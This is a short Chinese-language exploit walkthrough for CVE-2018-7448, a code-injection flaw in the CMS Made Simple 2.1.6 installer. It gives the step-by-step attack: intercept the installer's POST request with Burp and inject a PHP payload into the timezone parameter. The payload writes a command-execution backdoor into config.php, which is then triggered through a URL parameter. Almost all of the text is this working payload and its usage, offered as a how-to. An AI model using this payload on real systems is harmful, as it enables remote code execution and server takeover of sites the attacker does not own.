CMS Made Simple 2.1.6 RCE （CVE-2018-7448）

概述

CMS Made Simple 2.1.6版本存在代码注入漏洞，可以通过 timezone 参数执行任意代码

CMS Made Simple 2.1.6

访问CMS Made Simple的安装界面（为了注入 PHP 代码，需要全新安装和有效的数据库凭据）

来到第四步，提交时使用burp抓包

在POST请求中的timezone参数中插入payload

junk';echo%20system($_GET['cmd']);$junk='junk

放包，一直下一步，安装完后访问config.php

http://xxx/config.php?cmd=phpinfo();